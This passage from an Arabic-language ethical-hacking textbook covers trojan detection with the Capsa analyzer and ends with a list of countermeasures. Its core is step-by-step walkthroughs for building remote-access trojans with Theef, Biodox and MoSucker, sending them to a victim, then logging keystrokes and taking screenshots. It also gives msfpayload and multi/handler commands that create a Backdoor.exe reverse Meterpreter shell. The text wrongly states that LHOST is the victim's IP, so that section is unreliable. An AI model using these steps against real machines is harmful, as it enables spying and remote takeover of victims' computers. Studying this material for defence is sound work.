‫اﻻﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﺗﺣﻛم وإرﺳﺎل ﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ إﻟﻰ اﻟﻣﮭﺎﺟﻣﯾن‪ .‬اﺳﺗﺧدام ﻓﺎﺣص اﻟﺷﺑﻛﺔ و‪ packet sniffer‬ﻟﻣراﻗﺑﺔ ﺣرﻛﺔ‬
‫اﻟﺷﺑﻛﺔ ﻣن ﺣﯾث اﻟذھﺎب إﻟﻰ ﻋﻧﺎوﯾن ﺑﻌﯾدة ﺧﺑﯾﺛﺔ‪ .‬ﻣن أﺟل ﺗﺟﻧب ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺈﻧﮫ ﻣن اﻷﻓﺿل داﺋﻣﺎ ﻓﺣص ﻧﺷﺎط اﻟﺷﺑﻛﺔ اﻟﻣﺷﺑوه‪ .‬ﻣﻊ‬
‫ﻣﺳﺎﻋدة ﻣن أدوات اﻟﻔﺣص‪ ،‬ﯾﻣﻛﻧك ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ﯾﺗم ﻧﻘل اﻟﺑﯾﺎﻧﺎت إﻟﻰ ﻣﺻدر ﺑﻌﯾده ﺧﺑﯾﺛﺔ‪ .‬ﺑﺎﺳﺗﺧدام أدوات اﻟﻔﺣص ﻋﺑر اﻟﺷﺑﻛﺔ ﻣﺛل‬
‫‪ ،Capsa‬ﯾﻣﻛﻧك ﺗﺣدﯾد ھذه اﻷﻧﺷطﺔ‪.‬‬
‫‪Detecting Trojans and Worms with Capsa Network Analyzer‬‬

‫اﻟﻣﺻدر‪http://www.colasoft.com :‬‬
‫ﻛﺎﺑﺳﺎ ھو ﻣﺣﻠل ﻟﻠﺷﺑﻛﺔ واﻟﺗﻲ ﯾوﻓر ﻣﺎ ﯾﻛﻔﻲ ﻣن اﻟﻣﻌﻠوﻣﺎت ﻟﻠﻣﺳﺎﻋدة ﻓﻲ ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ھﻧﺎك أي ﻧﺷﺎط ﺗروﺟﺎن ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ﺑل ھو ﻣﺣﻠل‬
‫ﺷﺑﻛﺔ ‪ portable‬ﻟﻠﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ‪/‬اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ اﻟﻼﺳﻠﻛﯾﺔ )‪(LANs\WLANs‬واﻟﺗﻲ ﺗﻧﻔذ اﻟﺗﻘﺎط اﻟﺣزم‪ ،‬رﺻد اﻟﺷﺑﻛﺔ‪ ،‬ﺗﺣﻠﯾل‬
‫اﻟﺑروﺗوﻛول اﻟﻣﺗﻘدم‪ ،‬ﻓك ﺗﺷﻔﯾر اﻟﺣزم‪ ،‬واﻟﺗﺷﺧﯾص ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬

‫‪551‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﻣﻣﯾزات ﻛﺎﺑﺳﺎ ﻟﺗﺣﻠﯾل اﻟﺷﺑﻛﺔ واﻟﺗﻲ ﺗﺷﻣل اﻻﺗﻲ‪:‬‬
‫‪ -‬اﻟﺗﻘﺎط وﺣﻔظ اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ اﻟﻣﻧﻘوﻟﺔ ﻋﺑر اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﺷﺑﻛﺔ اﻟﺳﻠﻛﯾﺔ واﻟﺷﺑﻛﺔ اﻟﻼﺳﻠﻛﯾﺔ ﻣﺛل‬
‫‪a/b/g/n802.11‬‬
‫‪ -‬رﺻد اﻟﻧطﺎق اﻟﺗرددي ﻟﻠﺷﺑﻛﺔ واﺳﺗﺧدام ﻣن ﺧﻼل اﻟﺗﻘﺎط ﺣزم اﻟﺑﯾﺎﻧﺎت اﻟﻣﻧﻘوﻟﺔ ﻋﺑر اﻟﺷﺑﻛﺔ وﺗﻘدﯾم ﻣﻠﺧص وﻓك اﻟﻣﻌﻠوﻣﺎت ﺣول ھذه‬
‫اﻟﺣزم‪.‬‬
‫‪ -‬ﻋرض إﺣﺻﺎءات اﻟﺷﺑﻛﺔ‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﺳﮭوﻟﺔ اﻻﻟﺗﻘﺎط وﺗﻔﺳﯾر ﺑﯾﺎﻧﺎت اﺳﺗﺧدام اﻟﺷﺑﻛﺔ‪.‬‬
‫‪ -‬ﻣراﻗﺑﺔ اﻹﻧﺗرﻧت واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ وﺣرﻛﺔ اﻟﻣرور‪ ،‬ﻣﻣﺎ ﯾﺳﺎﻋد إﺑﻘﺎء إﻧﺗﺎﺟﯾﺔ اﻟﻣوظﻔﯾن إﻟﻰ اﻟﺣد اﻷﻗﺻﻰ‪.‬‬
‫‪ -‬ﺗﺷﺧﯾص وﺗﺣدﯾد ﻣﺷﺎﻛل اﻟﺷﺑﻛﺔ ﻓﻲ ﺛوان ﻋن طرﯾﻖ اﻟﻛﺷف وﺗﺣدﯾد اﻟﻣﺿﯾﻔﯾن اﻟﻣﺷﺑوه ﻓﯾﮭم‪.‬‬
‫‪ -‬رﺳم اﻟﺗﻔﺎﺻﯾل‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﺣرﻛﺔ اﻟﻣرور‪ ،‬وﻋﻧوان ‪ ،IP‬و‪ ،MAC‬ﻋن ﻛل ﻣﺿﯾف ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﺑﺳﮭوﻟﺔ ﺗﺣدﯾد ﻛل‬
‫ﻣﺿﯾف وﺣرﻛﺔ اﻟﻣرور اﻟﺗﻲ ﺗﻣر ﻣن ﺧﻼﻟﮫ‪.‬‬
‫‪ -‬ﺗﺻوﯾر اﻟﺷﺑﻛﺔ ﺑﺎﻟﻛﺎﻣل ﻓﻲ اﻟﻘطﻊ اﻟﻧﺎﻗص اﻟذي ﯾظﮭر اﺗﺻﺎﻻت وﺣرﻛﺎت اﻟﻣرور ﺑﯾن ﻛل ﻣﺿﯾف‪.‬‬
‫)‪Some Other Technique For Using Trojan (6.6‬‬
‫‪Creating a Server Using the Theef‬‬

‫‪ Theef‬ھو ﺗطﺑﯾﻖ ﻗﺎﺋم ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز وﯾﻧﻘﺳم اﻟﻰ ﻧوﻋﯾن ‪ client‬و ‪ Theef server .server‬ﻋﺑﺎره ﻋن ﻓﯾروس ﯾﺗم ﺗﺛﺑﯾت‬
‫ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ ,‬أﻣﺎ ‪ Theef client‬ھو ﻣﺎ ﯾﺳﺗﺧدﻣﮫ اﻟﻣﮭﺎﺟم ﻟﻠﺳﯾطرة ﻋﻠﻰ ھذا اﻟﻔﯾروس‬
‫ﻋﻧد اﻟﺣﺻول ﻋﻠﻰ ھذا ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﺑﺎﻧﮫ ﯾﺗﻛون ﻣن ﻣﻠﻔﯾن ﻧﺟد ان اﻟﻣﻠف ‪ Theef servers‬ﺳوف ﺗﻘوم ﺑﺈرﺳﺎﻟﮫ اﻟﻰ اﻟﺿﺣﯾﺔ‪.‬‬ ‫‪-‬‬
‫اﻣﺎ اﻟﻣﻠف ‪ Theef client‬واﻟذي ﯾﺗﺣﻛم ﻓﻲ ھذا اﻟﻔﯾروس‪ ،‬ﺳوف ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﯾﮫ ﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬ ‫‪-‬‬
‫ﻓﻲ اﻟﺧﺎﻧﺔ اﻟﻣﺧﺻﺻﺔ ﻟﻌﻧوان ‪ IP‬ﻧﻘوم ﺑﺈدﺧﺎل ﻋﻧوان ‪ IP‬اﻟﺧﺎص ﺑﺎﻟﺿﺣﯾﺔ وﻧﺗرك ﺑﺎﻗﻲ اﻻﻋداد ﻛﻣﺎ ھﯾﺎ ﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق‬ ‫‪-‬‬
‫‪.CONNECT‬‬

‫‪552‬‬
‫اﻻن وﻗد ﻗﻣت ﺑﺎﻻﺗﺻﺎل ﺑﺎﻟﺿﺣﯾﺔ ﯾﻣﻛن اﻻن إﺟراء اﻟﻛﺛﯾر ﻣن اﻷﺷﯾﺎء ﻋن طرﯾﻖ اﺧﺗﯾﺎر ﻣﺎ ﺗرﯾده ﻣن ﺷرﯾط اﻷدوات اﻟﺳﻔﻠﻰ‪.‬‬ ‫‪-‬‬
‫ﻟرؤﯾﺔ ﻣﻌﻠوﻣﺎت ﻋن ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﯾﻣﻛن ذﻟك ﺑﺎﻟﻧﻘر ﻓوق أﯾﻘوﻧﺔ اﻟﻛﻣﺑﯾوﺗر‪.‬‬ ‫‪-‬‬
‫ﻋﻧد اﻟﻧظر اﻟﻰ اﻟﻣﻌﻠوﻣﺎت ﻋن ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﯾﻣﻛن رؤﯾﺔ ‪ ،Home ،OS Info ،PC Details‬و‪ Network‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬
‫ﻋﻧد اﻟﻧﻘر ﻓوق أﯾﻘوﻧﺔ ‪ spy‬ﯾﻣﻛﻧك اﻟﺗﻘﺎط ‪ screenshot‬ﻟﺟﮭﺎز اﻟﺿﺣﯾﺔ وﻛذﻟك ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎص ﺑﺎﻟﺿﺣﯾﺔ وھﻛذا‪.‬‬ ‫‪-‬‬
‫ﻛذﻟك ﯾﻣﻛن ﻓﻌل اﻟﻛﺛﯾر ﻣن اﻷﺷﯾﺎء‪.‬‬ ‫‪-‬‬
‫‪Creating a Server Using the Biodox‬‬
‫‪ Biodox‬ھو ﺗطﺑﯾﻖ ﻗﺎﺋم ﻋﻠﻰ ﻧظﺎم اﻟوﯾﻧدوز وھو ﻣﺛل ‪ Theef‬وھو ﻋﺑﺎره ﻋن ‪ GUI Trojan‬واﻟﺗﻲ ﺗﻣت ﻛﺗﺎﺑﺗﮫ ﻣن ﻗﺑل اﻻﺗراك‪.‬‬
‫ﻟﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق اﻟﻣﻠف ‪ BIODOX OE Edition.exe‬واﻟﺗﻲ ﺳوف ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﻣن ﺧﻼل اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ ﻧﺧﺗﺎر اﻟﻠﻐﺔ اﻟﺗﻲ ﺗرﯾد ان ﺗﺗﻌﺎﻣل ﺑﮭﺎ ﻣﻊ اﻟﺗطﺑﯾﻖ‪.‬‬ ‫‪-‬‬

‫‪553‬‬
‫‪-‬‬
‫ﻧﻘوم ﺑﺎﻟﻧﻘر ﻋﻠﻰ اﯾﻘوﻧﺔ ‪ server editor‬ﻛﻣﺎ ھو ﻣوﺿﺢ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻟﻛﻲ ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ‪ server‬اﻟذي ﺗرﯾد ارﺳﺎﻟﮫ اﻟﻰ‬ ‫‪-‬‬
‫اﻟﺿﺣﯾﺔ‪.‬‬
‫ﻓﻲ اﻟﻌﻧوان اﻟﻣﻘﺎﺑل ‪ IP/DNS‬ﻧﻘوم ﺑﺈدﺧﺎل ﻋﻧوان اﻟﺿﺣﯾﺔ وﻧﺗرك ﺑﺎﻗﻲ اﻻﻋدادات ﻛﻣﺎ ھﯾﺎ ﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق اﯾﻘوﻧﺔ ‪Create‬‬ ‫‪-‬‬
‫‪ server‬ﻛﺎﻻﺗﻰ ﻟﯾﻘوم ﺑﺈﻧﺷﺎء اﻟﻣﻠف ‪ server.exe‬اﻟذي ﺳوف ﺗرﺳﻠﮫ اﻟﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬
‫اﻻن ﺑﻌد اﻧﺷﺎء اﻟﻣﻠف ‪ server.exe‬ﻧﻘوم ﺑﺈرﺳﺎﻟﮫ اﻟﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ وﺑﻣﺟر ﻧﻘر اﻟﺿﺣﯾﺔ ﻓوﻗﮫ ﺳوف ﯾﺑدا اﻟﻌﻣل‪.‬‬ ‫‪-‬‬

‫‪554‬‬
‫ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق اﯾﻘوﻧﺔ ‪ active/deactive status‬ﻟرؤﯾﺔ اﻻﺗﺻﺎﻻت اﻟﺗﻲ ﺗم وﻗوع اﻟﺿﺣﯾﺔ ﺑﮭﺎ ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬
‫ﺣﯾث ﻧﻼﺣظ ھﻧﺎ ﺣدوث اﺗﺻﺎل ﻣﻊ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬ ‫‪-‬‬

‫اﻻن ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑﺎﻟﻛﺛﯾر ﻣن اﻷﻧﺷطﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ وذﻟك ﻋن طرﯾﻖ اﻻﺳﺗﻌﺎﻧﺔ ﺑﺷرﯾط اﻷدوات اﻟﻣوﺟود ﻓﻲ اﻟﺟﺎﻧب اﻻﯾﺳر‪.‬‬ ‫‪-‬‬
‫‪Creating a Server Using the MoSucker‬‬

‫‪ MoSucker‬ھو اداه ﺗم اﻧﺷﺎﺋﮭﺎ ﺑﺎﺳﺗﺧدام ﻓﯾﺟول ﺑﯾﺳك )‪ .(Visual Basic Trojan‬ﯾﻘوم ھو اﻻﺧر ﺑﺈﻧﺷﺎء ﺑرﻧﺎﻣﺞ ‪ server‬ﻣﺛل‬
‫اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﻗﻣﻧﺎ ﺑﺷرﺣﮭﺎ ﻟﻠﺗو‪.‬‬
‫ﻹﻧﺷﺎء ﻣﻠف ‪ server.exe‬ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻓوق ‪ CreateServer.exe‬ﻓﺗؤدى ﻟظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬ ‫‪-‬‬
‫ﻧﺗرك اﻹﻋدادات اﻻﻓﺗراﺿﯾﺔ ﻛﻣﺎ ھﯾﺎ ﺛم ﻧﻧﻘر ﻓوق ‪.ok‬‬ ‫‪-‬‬

‫ھﻧﺎ ﯾطﻠب ﻣﻧك اﻻﺳم واﻟﻣﻛﺎن اﻟذي ﺗرﯾد ﺣﻔظ ﺑﮫ اﻟﻣﻠف ‪ .server.exe‬ﺛم ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ واﻟﺗﻲ ﺗﺧﺑرك ﺑﺎﻧﮫ ﯾﻘوم إﻧﺷﺎء‬ ‫‪-‬‬
‫‪.server.exe‬‬

‫‪555‬‬
‫ﺛم ﯾظﮭر ﻟك ﺻﻧدوق رﺳﺎﻟﺔ ﯾﺧﺑرك ﺑﺎﻻﻧﺗﮭﺎء ﻣن ﺻﻧﺎﻋﺔ ‪ server.exe‬ﻧﻧﻘر ﻓوق ‪ .ok‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ اﻟﺗﻲ‬ ‫‪-‬‬
‫ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن وﺿﻊ اﻟﻌدﯾد ﻣن اﻻﻋدادات واﻻﻣﻛﺎﻧﯾﺎت اﻟﺗﻲ ﯾﻣﻛن ان ﯾؤدﯾﮭﺎ ھذا اﻟﻔﯾروس ﻛﺎﻻﺗﻰ‪:‬‬
‫اﻻن ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن اﻧﺷﺎء ‪ server.exe‬وارﺳﺎﻟﮫ اﻟﻰ اﻟﺿﺣﯾﺔ واﻟذي ﺑﻣﺟرد اﻟﻧﻘر ﻓوﻗﮫ ﯾﻘوم ﺑﺗﻔﻌﯾﻠﮫ‪.‬‬ ‫‪-‬‬
‫اﻻن ﻧذھب ﻟﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻟﻌﻣل اﺗﺻﺎل ﺑﺎﻟﺿﺣﯾﺔ وذﻟك ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻓوق ‪ MoSucker.exe‬ﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﻣﺛل اﻻﺧرﯾن ﻓﻲ ﺧﺎﻧﺔ ‪ IP‬ﻧﻘوم ﺑﺈدﺧﺎل ﻋﻧوان ‪ IP‬اﻟﺿﺣﯾﺔ ﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ connect‬ﺣﺗﻰ ﯾﺗم اﻻﺗﺻﺎل ﺑﺎﻟﺿﺣﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻣوﺟودة ﻓﻲ اﻟﺟﺎﻧب اﻻﯾﺳر ﯾﻣﻛن ﻓﻌل اﻟﻛﺛﯾر ﻣن اﻷﺷﯾﺎء ﺑﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬ ‫‪-‬‬
‫‪Creating a Server Using the Metasploit‬‬

‫ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ metasploit‬اﻟﺧﺎص ﺑﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل ﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﻋن ذﻟك‬ ‫‪-‬‬
‫ﺳﺎﺑﻘﺎ‪.‬‬
‫ﺑﻌد ﻓﺗﺢ ﺑرﻧﺎﻣﺞ ‪ metasploit‬ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬
‫‪msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > /Desktop/Backdoor.exe‬‬
‫ﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Enter‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫‪556‬‬
‫ﯾﺟب ان ﻧﻼﺣظ ان ‪ LHOST‬ھو ﻋﻧوان ‪ IP‬ﻟﺟﮭﺎز اﻟﺿﺣﯾﺔ اﻟﮭدف‪.‬‬ ‫‪-‬‬

‫ﺑﻌد اﻻﻧﺗﮭﺎء ﺳوف ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ﺗروﺟﺎن ﺑﺎﺳم ‪.Backdoor.exe‬‬ ‫‪-‬‬
‫اﻻن ﻧﻘوم ﺑﺎرﺳﺎل اﻟﻣﻠف اﻟﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ واﻟذي ﯾﻌﻣل ﺑﻣﺟرد اﻟﻧﻘر ﻓوﻗﮫ‪.‬‬ ‫‪-‬‬
‫ﺑﻌد ﺗﻔﻌﯾل ھذا اﻟﻣﻠف ﻓﻲ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺳوف ﻧﺣﺗﺎج اﻟﻰ اﻧﺷﺎء ﻣﺗﺣﻛم ﻟﮭذا اﻟﻣﻠف وذل ﻋن طرﯾﻖ طﺑﺎﻋﺔ اﻻﻣر اﻟﺗﺎﻟﻲ ﻓﻲ‬ ‫‪-‬‬
‫‪ Metasploit‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪use exploit/multi/handler‬‬
‫ﺛم اﻟﻧﻘر ﻓوق ‪Enter‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬
‫اﻻن ﻧﻘوم ﺑﻛﺎﺗﺑﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ ]‪ [set payload windows/meterpreter/reverse_tcp‬وذﻟك ﻟﻠﻘﯾﺎم ﺑﺎﺗﺻﺎل ﻋﻛﺳﻲ ﻣﻊ‬ ‫‪-‬‬
‫ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫ﻧﻘوم ﺑوﺿﻊ ﻋﻧوان ‪ IP‬اﻟﺧﺎص ﺑك ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬
‫اﻻن ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻟﻠﻘﯾﺎم ﺑﺎﺗﺻﺎل ﻋﻛﺳﻲ ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬
‫ﺑﻣﺟرد ﻗﯾﺎم اﻟﺿﺣﯾﺔ ﺑﺎﻟﻧﻘر ﻓوق ‪ Backdoor.exe‬ﻓﯾﻣﻛﻧك اﻟﺗﻔﺎﻋل ﻣﻌﮫ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ ]‪ [sessions -i 1‬وذﻟك‬ ‫‪-‬‬
‫ﻹﻧﺷﺎء ﻗﻧﺎة اﺗﺻﺎل ﺑﯾﻧك وﺑﯾن ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬
‫ﺑﻌض اﻻﺗﺻﺎل ﺑﺟﮭﺎز اﻟﺿﺣﯾﺔ ﯾﻣﻛﻧك طﺑﺎﻋﺔ اﻻﻣر ‪ shell‬ﻻﺳﺗﺧدام أواﻣر اﻟﺷل‪.‬‬ ‫‪-‬‬
‫)‪ (6.7‬اﻟﻄﺮق اﻟﻤﻀﺎدة ﺿﺪ اﻟﺘﺮوﺟﺎن )‪(Trojan Countermeasure‬‬
‫ﺣﺗﻰ اﻵن‪ ،‬ﻟﻘد ﻧﺎﻗﺷﻧﺎ ﻣﺧﺗﻠف أﺣﺻﻧﺔ طروادة واﻟطرق اﻟﺗﻲ ﺗﺻﯾب ﺑﮭﺎ ﻣوارد اﻟﻧظﺎم أو اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧزﻧﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻓﺿﻼ ﻋن‬
‫ﺳﺑل اﻟﻛﺷف ﻋن أﺣﺻﻧﺔ طروادة ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﺑﻣﺟرد اﻟﻛﺷف ﻋن طروادة‪ ،‬ﯾﺟب ﻋﻠﯾك ﺣذﻓﮫ ﻓورا وﺗطﺑﯾﻖ اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة اﻟﺗﻲ‬
‫ﺗوﻓر اﻟﺣﻣﺎﯾﺔ ﺿد أﺣﺻﻧﺔ طروادة و‪ .Backdoor‬ھذه اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﺗﻘﻠل ﻣن اﻟﻣﺧﺎطر وﺗوﻓﯾر اﻟﺣﻣﺎﯾﺔ اﻟﻛﺎﻣﻠﺔ ﻟﻠﻧظﺎم اﻟﻣﺳﺗﺧدم‪.‬‬
‫ﯾﺑرز ھذا اﻟﻘﺳم اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ اﻟﻣﺿﺎدة اﻟﺗﻲ ﺗﻣﻧﻊ أﺣﺻﻧﺔ طروادة و‪ backdoor‬ﻣن اﻟدﺧول إﻟﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫‪Trojan Countermeasure‬‬
‫ﺣﺻﺎن طروادة ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﺗﻧﻛر ﻛﺗطﺑﯾﻖ ﺣﻘﯾﻘﻲ‪ .‬ﻋﻧدﻣﺎ ﯾﺗم ﺗﻧﺷﯾط أﺣﺻﻧﺔ طروادة ھذه‪ ،‬ﻓﺄﻧﮭﺎ ﺗؤدي إﻟﻰ اﻟﻌدﯾد ﻣن اﻟﻘﺿﺎﯾﺎ ﻣﺛل‬
‫ﻣﺣو اﻟﺑﯾﺎﻧﺎت‪ ،‬اﺳﺗﺑدال اﻟﺑﯾﺎﻧﺎت ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬إﻓﺳﺎد اﻟﻣﻠﻔﺎت‪ ،‬ﻧﺷر اﻟﻔﯾروﺳﺎت‪ ،‬اﻟﺗﺟﺳس ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ واﻹﺑﻼغ ﻋن‬
‫اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ ،‬ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻟﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﺛل رﻗم ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن‪ ،‬وأﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﺳر وﻏﯾرھﺎ‪ ،‬وﻓﺗﺢ‬
‫‪ backdoor‬ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ ﻟﺗﻧﻔﯾذ اﻷﻧﺷطﺔ ﻏﯾر اﻟﻣﺳﺗﻘرة ﻓﻲ اﻟﻣﺳﺗﻘﺑل‪ .‬ﻣن أﺟل ﻣﻧﻊ ﻣﺛل ھذه اﻷﻧﺷطﺔ وﺗﻘﻠﯾل اﻟﻣﺧﺎطر ﺿد ﺣﺻﺎن‬
‫طروادة‪ ،‬ﯾﻧﺑﻐﻲ اﻋﺗﻣﺎد اﻟﻣﺿﺎدات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬ﺗﺟﻧب ﻓﺗﺢ ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة ﻣن ﻣﺻﺎدر ﻏﯾر ﻣﻌروﻓﮫ‪.‬‬
‫‪ -‬ﻣﻧﻊ ﻛﺎﻓﺔ اﻟﻣﻧﺎﻓذ اﻟﻐﯾر ﺿرورﯾﺔ ﻓﻲ اﻟﺟﮭﺎز اﻟﻣﺿﯾف وﺟدار اﻟﺣﻣﺎﯾﺔ‪.‬‬
‫‪ -‬ﺗﺟﻧب ﻗﺑول اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗم ﻧﻘﻠﮭﺎ ﺑواﺳطﺔ اﻟرﺳﺎﺋل‪.‬‬
‫‪ -‬ﻣﻌﺎﻟﺟﺔ ﻧﻘﺎط اﻟﺿﻌف‪ ،‬وإﻋدادات اﻟﺗﻛوﯾن اﻻﻓﺗراﺿﻲ‪.‬‬
‫‪ -‬ﺗﻌطﯾل اﻟوظﺎﺋف اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﺑروﺗوﻛوﻻت واﻟﺧدﻣﺎت‬
‫‪ -‬ﻣراﻗﺑﺔ ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ ﻟﻠﻣﻧﺎﻓذ اﻟﻐرﯾﺑﺔ أو اﻟﻣرور اﻟﻣﺷﻔر‪.‬‬

‫‪557‬‬
‫ﺗﺟﻧب ﺗﺣﻣﯾل وﺗﺷﻐﯾل اﻟﺗطﺑﯾﻘﺎت ﻣن اﻟﻣﺻﺎدر اﻟﻐﯾر ﻣوﺛوق ﺑﮭﺎ‪.‬‬ ‫‪-‬‬

‫ﺗﺛﺑﯾت ‪ bugs‬واﻟﺗﺣدﯾﺛﺎت اﻷﻣﻧﯾﺔ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت‪.‬‬ ‫‪-‬‬
‫ﻓﺣص اﻷﻗراص اﻟﻣدﻣﺟﺔ واﻷﻗراص اﻟﻣرﻧﺔ ﻣﻊ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻗﺑل اﻻﺳﺗﺧدام‪.‬‬ ‫‪-‬‬
‫ﺗﻘﯾﯾد اﻷذوﻧﺎت ﺿﻣن ﺑﯾﺋﺔ ﺳطﺢ اﻟﻣﻛﺗب ﻟﻣﻧﻊ ﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬ ‫‪-‬‬
